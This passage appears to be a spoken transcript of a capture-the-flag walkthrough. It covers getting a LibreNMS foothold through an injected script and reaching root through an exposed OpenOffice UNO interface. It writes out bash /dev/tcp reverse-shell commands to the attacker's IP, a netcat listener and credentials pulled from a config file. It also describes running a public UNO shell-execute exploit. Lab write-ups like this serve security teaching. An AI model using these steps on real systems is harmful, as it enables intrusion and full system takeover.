alerts? Nope. I wonder if I have to be logged in as IPSec to see that. Let's nano exploit again. I'm going to try changing the target to be 10.10.11.6 and see if we see it. Save that. Write it. We sent one packet. Let's refresh. I don't see anything for this device, and we're not getting something on our server. So I think we may have done something wrong, but thankfully, we can validate it ourselves. So let's see. We went there, clicked on this device, click on logs. I think I just saw it right here. So we do have the script source. So it is sending the payload, and our browser does hit it. So I'm hoping maybe in a minute or two, we'll see the other box hit it. Let's see. Do we still have this? Yep. It's still there. Okay, there we go. So 10.10.11.6 hit it. And maybe it's every minute. And we did not stand up a listener. So let's do that. nclvnp 9001. Let's clear that screen. Run this. Run. And I'm going to sleep 1 minute, and we'll see if we get a hit and then a shell come back. There we go. We have a hit here from the server, but no shell. So something happened. Let's look at our thing. So cd www libri.js. Something is wrong here. Let's see. Template PHP. Dev TCP. We had an extra character. Okay. Stamp the server. It hit. And the browser should be sending us over. That is weird that that's not happening. Let's see. Bash-c, bash-i, dev tcp 10.10.14.8, 0 and 1. Don't know why that's not working. Let's see. Let's stand up on 8,000 so we can see the server hitting us. I was thinking maybe we have to specify the IP here, but since we're just doing a fetch on Ajax form, I don't think so. Let's see, the referral is 127.0.0.1.3000. Let's see, method. Like that. And let's see. Just want to paste this in here. I think that'll be fine. Send that again. And I'm going to wait for it to hit me. And we have a hit. So apparently, for some reason, we had to hard code the fetch. I don't know exactly why we couldn't just do /ajox form. Maybe it was actually like making a request to my box. Maybe that's possible. Not exactly sure what was going on there, but when we had it with the correct host, it all worked. So now that we have a shell on the box as LibreNMS, let's see. We already have a proper shell here. The intended thing to do was to pull the database config, this .custom.env file. So if we cat it, we have a username Kai Relay and a password MyChemicalFormulaX. So if we SSH Kai Relay at 10.10.11.6, put in that password, we get logged in. So now we're as Kai, and if we do a sudo-l, we can execute this office.sh as root. And I'm going to cat it. So if we cat office.sh, we see it's going to run soffice, which I think is OpenOffice, and then set up a port on 2002. So let's just run this. If I do sudo user bin office.sh, and then I'm going to do proxy chains 127.0.0.1 2002. Proxy chains, we didn't say netcat. There we go. We have it coming back with the banner. So what I did is I just Googled this banner. So if we're going to go to Google, and then I'm going to search for this, and then I'll just say exploit maybe. And we have this Apache Uno thing. And this Hack Defense article is probably the best post on it. But of course, we can just run the Python script on here. But what this library is, and I think it affects the latest version of OpenOffice still. So if you use the remote access thing, it's just like a RPC interface to my understanding. And by default, they have this system shell execute library in it. So if we can connect to the RPC, we can just call shell execute and get code execution. That's essentially what this blog post is telling us. So I'm going to go over here. Let's see, is this good? Let's just copy this. And then we can say v, I'm going to call this exploit.py, paste this in, and let's see. It's executing calc.exe. We're probably going to do bash. And my first thing was like -c. Let's see, we can put this in double quotes, and then bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. Like this was my first thought, and this doesn't work. How do we use this? I think we just have to say Python 3 exploit 127.0.0.1 2002 proxy chains --host --port. And for some reason, how we pass the arguments to it is just wrong, right? We see dash is an invalid option. So maybe we can't use -c. So my thought was just this. Run it again. And we get no such file or directory. So it's thinking it wants a file when we don't specify it that way. If we did -- version, it actually just magically works. So it treats this like you would expect. So I played around a lot with this, right? We didn't get like, it doesn't know the command, it just displayed it. I couldn't figure out a way to get this working. And even if we went in to the library, let's see if we can find it really quick. API modules here. Where was it? It was OpenOffice off API com sun star. And they go to system. Let's see. System shell execute. Is this it? Execute flags. Let's see. There was better documentation on this. Maybe it's on the page or somewhere, but it tells us where it is. So xshell execute, the second parameter is just a string, an s parameter, and it's supposed to be space delimited. But there's a long way of saying I played around a lot with this and I couldn't get it to execute code like that, but I could just change it to be dev shm pwn. And then if we create that file on this box, so we go cd dev shm v pwn nanopwn bin bash --i dev tcp 10.10 14.8 9001 0 and 1 like that. chmod plus x pwn. We start up the listener. And then we run this. We get a shell. So I couldn't figure out exactly how to get arguments working that way, but if we just specify a file, it works just fine, and we can get root this way. And that was all slightly unintended. The intended way is to actually go to that port 8000 website. So if I go to localhost 8000, we have to tell that to go through the proxy. This remote management, if we use the name Kai Relay and then put in as password of my chemical FormulaX, we get this page. And this actually uses that sudo script to start OpenOffice that we saw. So if we click create file, it's going to create a essentially calc, which is like Excel version of this. If I click start instance, it's going to map port 2002 to this document. And what we're supposed to do is use Python's library to interact with that document and put a formula in the spreadsheet to include a file, and we can read files from that. We can probably like run macros and things like that, but I found the other way to be a bit more interesting, and I'm running out of time, so unfortunately I can't show this way, but that's it. I'm sure if you check out OXDS blog, he'll go into it. So take care all, and I will see you all next time.